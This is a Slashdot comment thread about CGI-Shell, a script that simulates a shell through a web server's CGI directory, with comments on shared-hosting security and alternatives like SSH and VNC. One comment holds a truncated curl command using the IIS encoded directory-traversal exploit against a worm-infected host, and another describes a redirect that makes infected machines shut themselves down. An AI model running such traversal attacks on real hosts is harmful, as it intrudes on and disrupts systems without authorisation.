Shell Simulation Via CGI 337
mischi writes "CGI-Shell simulates a shell using CGI. So everybody who has a CGI-directory on a web-server, also has its own shell on it -- comparable with Telnet or SSH.
That's really practical, because most webhosters don't offer a shell (for free) -- but do offer CGI.
With CGI-Shell you can execute commands, copy files or just explore your webserver. Even a history and auto-completion with tabulator are included.
"
Re:security? (Score:5, Informative)
If two or more people on a server both install this, they can read and modify each other's files, etc. since the CGIs will be running as the same user.
Probable hosting service response. (Score:5, Informative)
Min
Re:Shell whores. (Score:3, Informative)
You can get more info here [eggheads.org].
Re:security? (Score:5, Informative)
Re:security? (Score:2, Informative)
Re:I've used something exatly like this for months (Score:2, Informative)
So you could limit it to ls, rm, mv, and cp with the users security level.
All it does is shell commands and pipe stdout back onto the form.
It's such a trivial script I'm surprised its newsworthy even by
Re:How about a Java ssh/telnet applet? (Score:3, Informative)
I like this idea better than a cgi-bin shell which might pass along naughty combinations of characters, and has everything in plain text to risk snooping.
lynx!? (Score:3, Informative)
I give the hosted users of my server [frob.us] ssh access for the sole reason that it keeps them from running shit like this.
Despite the BOFH myths, which I am guilty of perpetuating, not all sysadmins are jackasses. So long as the sysadmin knows you and you promise not to abuse priveledges you can get everything short of root and
If you really need shell access and don't want to risk losing your account just send your sysadmin a thinkgeek caffeine sampler and some shirts. Massive capacity SCSI disks are a great substitute.
Re:How about a Java ssh/telnet applet? (Score:3, Informative)
Re:How about a Java ssh/telnet applet? (Score:3, Informative)
TightVNC also includes a java client if you want to have a graphical remote connection.
I carry a business card size cd with putty and tightVNC and such on it to use most of the time though...
Reinventing the wheel... (Score:2, Informative)
Re:Doesn't IIS Already Have This? (Score:2, Informative)
It just redirects the client making the request to try and load the given page from the local machine. Assuming that the client making the request (the worm) understands redirections, that line makes it attempt to load 127.0.0.1 (the local IIS server that the worm infected) with a URL that will exploit the local worm (hehe) and use rundll32 to shut down the client's windows machine.
If it works, it's brilliant. I'm not sure the worm reads redirects, though. Anyone actually witness this working?
Even better; use the Java Telnet Application (Score:3, Informative)
BS (Score:3, Informative)
Example: Can the standard unix permissions give access to everyone in group a,b, and c, except for user x who is also a member of groups b and c, and y, as well as ensuring that z has full access to everything? No, you can't.
If you allow your customers to upload their own cgis, this is merely a tool.
This IS a good tool.
Actually, that is EXACTLY what they've done (Score:2, Informative)
Re:Doesn't IIS Already Have This? (Score:3, Informative)
would be nice, tho
Re:Doesn't IIS Already Have This? (Score:1, Informative)
curl http://$HISADDR/scripts/..%255c..%255cwinnt/syste
Shell != ability to run one command at a time (Score:3, Informative)
A shell is more than the ability to run simple commands; it provides an environment to run commands, maintain a command-line history, spawn processes, store variables, etc.
And any good CGI Shell should also take output from the system command and format it into HTML that will display in a browser the same as it would in the shell.
Am I missing something here, or is this "cgi shell" thing really not newsworthy?
This is new? (Score:4, Informative)
Since this got so much publicity I was expecting something new, such as the ability to interact with interactive programs. But it seems this one lacks that feature aswell, in essence making it a poor substitute for a real shell. Pico, micq, bitchx, su, passwd, any interactive program is UNUSABLE.
That is its biggest limitation.